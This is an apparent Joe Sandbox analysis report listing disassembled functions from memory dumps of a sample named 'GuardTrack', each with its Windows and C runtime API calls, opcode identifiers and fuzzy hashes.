Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 5ffd0adf6a41c16a3c06a0ba9624522da6b16a8d107ddf51868940a3dd54af9f
Instruction ID: 8c37ca09658908227621a608055a1c1ceb39107ec56c2994689bde38f9686ad1
Opcode Fuzzy Hash: 5ffd0adf6a41c16a3c06a0ba9624522da6b16a8d107ddf51868940a3dd54af9f
Instruction Fuzzy Hash: 5321A471A002899FDF15DFD8C849BEE7FF9AF89310F00405AE404A7281DBB55A88DFA1

Function 0062D1C6 Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 713cfdaa102aa460de0f020ef0c2b78bedef15172bde8595471c8a385f580083
Instruction ID: d2fbbf20a44e4cf86f7859e7f034ac0ff6fe9a9dccb4ebaafe7bb3cfbb2ab8a4
Opcode Fuzzy Hash: 713cfdaa102aa460de0f020ef0c2b78bedef15172bde8595471c8a385f580083
Instruction Fuzzy Hash: 42F149706087519FC714DF28D484A6ABBE6FF88314F14892EF8999B352D770E945CF82

Function 005C59D3 Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 005C59F9
Shell_NotifyIconW.SHELL32(00000000,?), ref: 005C5A9E
Shell_NotifyIconW.SHELL32(00000001,?), ref: 005C5ABB

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: f509be296e1a0d48892d9bef21ad4b7f14d1e65d024ea8925601227b8566c481
Instruction ID: 6509ec2634759e28636186815bb8692de6dafa499d9b71867d7fe5b55782a49c
Opcode Fuzzy Hash: f509be296e1a0d48892d9bef21ad4b7f14d1e65d024ea8925601227b8566c481
Instruction Fuzzy Hash: FD3161B05057018FD725DFA5D884B97BBF4FB49305F000A2EF6AA86251E771AA84CB52

Function 005D593C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 005D5953

Part of subcall function 005DA39B: __NMSG_WRITE.LIBCMT ref: 005DA3C2
Part of subcall function 005DA39B: __NMSG_WRITE.LIBCMT ref: 005DA3CC

__NMSG_WRITE.LIBCMT ref: 005D595A

Part of subcall function 005DA3F8: GetModuleFileNameW.KERNEL32(00000000,006753BA,00000104,?,00000001,005D1003), ref: 005DA48A
Part of subcall function 005DA3F8: ___crtMessageBoxW.LIBCMT ref: 005DA538

Part of subcall function 005D32CF: ___crtCorExitProcess.LIBCMT ref: 005D32D5
Part of subcall function 005D32CF: ExitProcess.KERNEL32 ref: 005D32DE

Part of subcall function 005D8D58: __getptd_noexit.LIBCMT ref: 005D8D58

RtlAllocateHeap.NTDLL(00FE0000,00000000,00000001,?,?,?,?,005D1003,?,0000FFFF), ref: 005D597F

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 886568c3a884ce1929edfb97e816b5f13a70c12723a91eb97fa3f40513e7f7d0
Instruction ID: 78973b82e65050e2538cdeb17d10f84312536d23f5932aad5a6c984da092134c
Opcode Fuzzy Hash: 886568c3a884ce1929edfb97e816b5f13a70c12723a91eb97fa3f40513e7f7d0
Instruction Fuzzy Hash: 37012231201B06DAE7353B3DA866A2E3B4ABF92370F600427F4199B3D1EEB08D40C661

Function 006192C8 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 006192D6

Part of subcall function 005D2F85: RtlFreeHeap.NTDLL(00000000,00000000,?,005D9C54,00000000,005D8D5D,005D59C3,?), ref: 005D2F99
Part of subcall function 005D2F85: GetLastError.KERNEL32(00000000,?,005D9C54,00000000,005D8D5D,005D59C3,?), ref: 005D2FAB

_free.LIBCMT ref: 006192E7
_free.LIBCMT ref: 006192F9

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 8f9c885abd8d04f58f23861dbdfd965b3870b9dc3bd9b8c44eca69e8d43aff98
Instruction ID: 090f433f5ed08290467fb2269eb8f3cc6c28571aee94b5246ac639058644f96e
Opcode Fuzzy Hash: 8f9c885abd8d04f58f23861dbdfd965b3870b9dc3bd9b8c44eca69e8d43aff98
Instruction Fuzzy Hash: F2E0C2E160460353CA30A63C6845EC3BBEC1FC8311B18080FB409D3742CE30E8C08078

Function 00617221 Relevance: 4.5, APIs: 3, Instructions: 21COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000002C,00000000,?,00000002,00000000,?,00617016,00000000,?,0061710A,00000000,00000000,005F2F49), ref: 00617237
GetCurrentProcess.KERNEL32(?,00000000,?,00617016,00000000,?,0061710A,00000000,00000000,005F2F49), ref: 0061723F
DuplicateHandle.KERNELBASE(00000000,?,00617016,00000000,?,0061710A,00000000,00000000,005F2F49), ref: 00617246

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: CurrentProcess$DuplicateHandle
String ID:
API String ID: 1294930198-0
Opcode ID: d049107ada330d5ff3cab757599bb3a5341ed946c5b0eae2781bd404afa85184
Instruction ID: 3f7b43e53f0b786916a75033b5a44bedacc59767faa1ef27c3e7dc9c0feca73b
Opcode Fuzzy Hash: d049107ada330d5ff3cab757599bb3a5341ed946c5b0eae2781bd404afa85184
Instruction Fuzzy Hash: 18D02E3E010300BFE7011BE4EC0DFBB3B7EDBC2B22F205018F305862909AB085425620

Function 00617079 Relevance: 4.5, APIs: 3, Instructions: 17COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 006177EB: InterlockedExchange.KERNEL32(?,?), ref: 006177FE
Part of subcall function 006177EB: EnterCriticalSection.KERNEL32(?,?,005BC2B6,?,?), ref: 0061780F
Part of subcall function 006177EB: TerminateThread.KERNEL32(00000000,000001F6,?,005BC2B6,?,?), ref: 0061781C
Part of subcall function 006177EB: WaitForSingleObject.KERNEL32(00000000,000003E8,?,005BC2B6,?,?), ref: 00617829
Part of subcall function 006177EB: InterlockedExchange.KERNEL32(?,000001F6), ref: 0061783C
Part of subcall function 006177EB: LeaveCriticalSection.KERNEL32(?,?,005BC2B6,?,?), ref: 00617843

FindCloseChangeNotification.KERNELBASE(?,?,006170DF), ref: 0061708A
CloseHandle.KERNEL32(?,?,006170DF), ref: 00617093
DeleteCriticalSection.KERNEL32(?,?,006170DF), ref: 006170A6

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: CriticalSection$CloseExchangeInterlocked$ChangeDeleteEnterFindHandleLeaveNotificationObjectSingleTerminateThreadWait
String ID:
API String ID: 744473657-0
Opcode ID: eac173da86f7f5d0ce55feb3ff1dd7c0a4f3229daa2e8ade9e827d47a42cfc42
Instruction ID: a0cd046dca4833708e91d7639d2f97e5a40a69e8f2328a0c6b1dd9e3b8aa2105
Opcode Fuzzy Hash: eac173da86f7f5d0ce55feb3ff1dd7c0a4f3229daa2e8ade9e827d47a42cfc42
Instruction Fuzzy Hash: A8E0EC3A000617FBD7422FA4FC0D889BFBABF45B113141516F50581A30CB7194B4CB50

Function 005B5E83 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 551COMMON

Download Yara Rule

Strings

CALL, xrefs: 005EE234

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 7d3fb2e9d28c7aa920601e012983d8e4bf45be2020120372f900dd99c99906d7
Instruction ID: 51a4f038c91cbe25c7d88064cf37570119735dad50a93eb3f92ddec93eb78756
Opcode Fuzzy Hash: 7d3fb2e9d28c7aa920601e012983d8e4bf45be2020120372f900dd99c99906d7
Instruction Fuzzy Hash: 15324A74508741DFDB28DF14C499BAABBE1BF84300F15896DE88A9B362D735EC45CB82

Function 0062E139 Relevance: 3.2, APIs: 2, Instructions: 227COMMON

Download Yara Rule

APIs

_strcat.LIBCMT ref: 0062E20C

Part of subcall function 005B4D37: __itow.LIBCMT ref: 005B4D62
Part of subcall function 005B4D37: __swprintf.LIBCMT ref: 005B4DAC

_wcscpy.LIBCMT ref: 0062E29B

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: __itow__swprintf_strcat_wcscpy
String ID:
API String ID: 1012013722-0
Opcode ID: 4e1ff084c8d397420e0fea8673c45fbe7a36062e4c78b7c0b623e6e72541cea8
Instruction ID: 84fc842e2509700bf8002d24747573afc13dcbb71f54dbea9b63d189eb672eca
Opcode Fuzzy Hash: 4e1ff084c8d397420e0fea8673c45fbe7a36062e4c78b7c0b623e6e72541cea8
Instruction Fuzzy Hash: 12913935A00915DFCB28DF18D5859A9BBE6FF89310B55806AE84A8F362DB31FD41CF81

Function 005D0E38 Relevance: 3.1, APIs: 2, Instructions: 94COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE ref: 005D0ED5
SetErrorMode.KERNELBASE ref: 005D0EE7

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: ChangeCloseErrorFindModeNotification
String ID:
API String ID: 1298299968-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 34d67767b1980b2ed08beb8965ec67a084d62ca517d75d92b758adcc88dd88b7
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: D931B871A001099BD728DF5DC480A69FBA9FF59310F649A97E409CB391D731EDC1CB80

Function 005C5F8B Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 005C5FEF

Part of subcall function 005D359C: __lock.LIBCMT ref: 005D35A2
Part of subcall function 005D359C: DecodePointer.KERNEL32(00000001,?,005C6004,00608892), ref: 005D35AE
Part of subcall function 005D359C: EncodePointer.KERNEL32(?,?,005C6004,00608892), ref: 005D35B9

Part of subcall function 005C5F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 005C5F18
Part of subcall function 005C5F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 005C5F2D

Part of subcall function 005C5240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 005C526C
Part of subcall function 005C5240: IsDebuggerPresent.KERNEL32 ref: 005C527E
Part of subcall function 005C5240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 005C52E6
Part of subcall function 005C5240: SetCurrentDirectoryW.KERNEL32(?), ref: 005C5366

SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 005C602F

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 8fc329e26877c8056d9e0f7c76d754d0654a25ecc90fa2eac7bae15f3d6d829a
Instruction ID: 9fab748ad740c49b08e43a462c0a8c18ba000beb0d859c96f1ef98a5176bc0d4
Opcode Fuzzy Hash: 8fc329e26877c8056d9e0f7c76d754d0654a25ecc90fa2eac7bae15f3d6d829a
Instruction Fuzzy Hash: 47114F715083029FC714DF69EC4994ABFE9FB94710F00491EF55897272DB70A684CB92

Function 005D581D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 005D584C
__lock_file.LIBCMT ref: 005D586D

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: ad4b144dadac498473f1e98cf30023e1ff22bf4bcb6e09883afa8e9181b86e4b
Instruction ID: 5b50b45d9895c272ecff0f29f192511dd82ec930639d4161224e6415ed13f71d
Opcode Fuzzy Hash: ad4b144dadac498473f1e98cf30023e1ff22bf4bcb6e09883afa8e9181b86e4b
Instruction Fuzzy Hash: CA01257180064AEBCF31AF6D8C0999E7F61BFC0360F244117B824563A1E7318611EB51

Function 005D55C6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 005D8D58: __getptd_noexit.LIBCMT ref: 005D8D58

__lock_file.LIBCMT ref: 005D560B

Part of subcall function 005D6E3E: __lock.LIBCMT ref: 005D6E61

__fclose_nolock.LIBCMT ref: 005D5616

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 0af8c6e55eb2fa0fe2cc861a519fb598b02c3a740f8177792404481c206e1831
Instruction ID: 2fc0da419d7faf37fd537c5ecdd27fc8b3f413d846da357a170d2eb3c72fb343
Opcode Fuzzy Hash: 0af8c6e55eb2fa0fe2cc861a519fb598b02c3a740f8177792404481c206e1831
Instruction Fuzzy Hash: 09F09671801B069AD7316B6D980976E6F917F81335F154107B464AB3C1DB7C89419B51

Function 00616FDA Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00000014,00000FA0,00000001,00000000,?,0061710A,00000000,00000000,005F2F49), ref: 00616FFF
InterlockedExchange.KERNEL32(00000034,00000000), ref: 00617021

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: CountCriticalExchangeInitializeInterlockedSectionSpin
String ID:
API String ID: 4104817828-0
Opcode ID: a8b6a58d21f390e7045704bedd0c12b9a8a9e3a09f14a01d2ec899cf4fc62aa4
Instruction ID: 570c59a281d7625c5780a5a74beddff5ea735b4749ab9a65c908ef16e402461b
Opcode Fuzzy Hash: a8b6a58d21f390e7045704bedd0c12b9a8a9e3a09f14a01d2ec899cf4fc62aa4
Instruction Fuzzy Hash: DAF034B11007159FD3209F56D9488A7FBFDEF85710B00882EE98A87A10C7B4A545CB61

Function 005D5E80 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 005D5EB4
__ftell_nolock.LIBCMT ref: 005D5EBF

Part of subcall function 005D8D58: __getptd_noexit.LIBCMT ref: 005D8D58

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: __ftell_nolock__getptd_noexit__lock_file
String ID:
API String ID: 2999321469-0
Opcode ID: e34dcaf4aed99f3d8b9bd3a0831809dfeb048eca1461e9211e08c76519f3bd3e
Instruction ID: 087c2f9cab2dfee2357bb35a14852304face6337504856a688ba1c23b778665d
Opcode Fuzzy Hash: e34dcaf4aed99f3d8b9bd3a0831809dfeb048eca1461e9211e08c76519f3bd3e
Instruction Fuzzy Hash: 5BF0A731911A179AD730BB7C880A76E7F94BF81332F214247B020AB3C2DF784A029B51

Function 005C5AC3 Relevance: 3.0, APIs: 2, Instructions: 25windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 005C5AEF
Shell_NotifyIconW.SHELL32(00000002,?), ref: 005C5B1F

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: IconNotifyShell__memset
String ID:
API String ID: 928536360-0
Opcode ID: c013c478d55308f666e3529c539adfa32bd4ef76cedaeb5c80ec32eb5e3baf7d
Instruction ID: fbc99f49941d3bfe2e23412ba79c98031073f7439256658bfd98e7041bfc063f
Opcode Fuzzy Hash: c013c478d55308f666e3529c539adfa32bd4ef76cedaeb5c80ec32eb5e3baf7d
Instruction Fuzzy Hash: ACF0A7708183189FD7A28B64DC497957BBCA70130CF0001EAAA5C96293DB710BC8CF51

Function 005D32CF Relevance: 3.0, APIs: 2, Instructions: 7COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtCorExitProcess.LIBCMT ref: 005D32D5

Part of subcall function 005D329B: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,005D32DA,005D1003,?,005D9EEE,000000FF,0000001E,0066CE28,00000008,005D9E52,005D1003,005D1003), ref: 005D32AA
Part of subcall function 005D329B: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 005D32BC

ExitProcess.KERNEL32 ref: 005D32DE

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: ad086d38d3e4e4a0991b7a8092c8738003ff0206a580e28dcf4954a8c215092a
Instruction ID: 15f66348be66cfe3323a79ac096b36ea10f53396e5e98781cad54c2117dd7514
Opcode Fuzzy Hash: ad086d38d3e4e4a0991b7a8092c8738003ff0206a580e28dcf4954a8c215092a
Instruction Fuzzy Hash: 97B09234000209BBDB122F15DC0E8483F2AFB01B90B405022F90408131EBB2AA929A91

Function 0062C355 Relevance: 1.8, APIs: 1, Instructions: 288COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: LoadString$__swprintf
String ID:
API String ID: 207118244-0
Opcode ID: 24166baab50d18c4610ba3f97159a87778ece8f8f2565281757f00af9bf92824
Instruction ID: 3b65b99b999bf9768923103c721754d719c8b00cc56bbf107253d7e479068cd8
Opcode Fuzzy Hash: 24166baab50d18c4610ba3f97159a87778ece8f8f2565281757f00af9bf92824
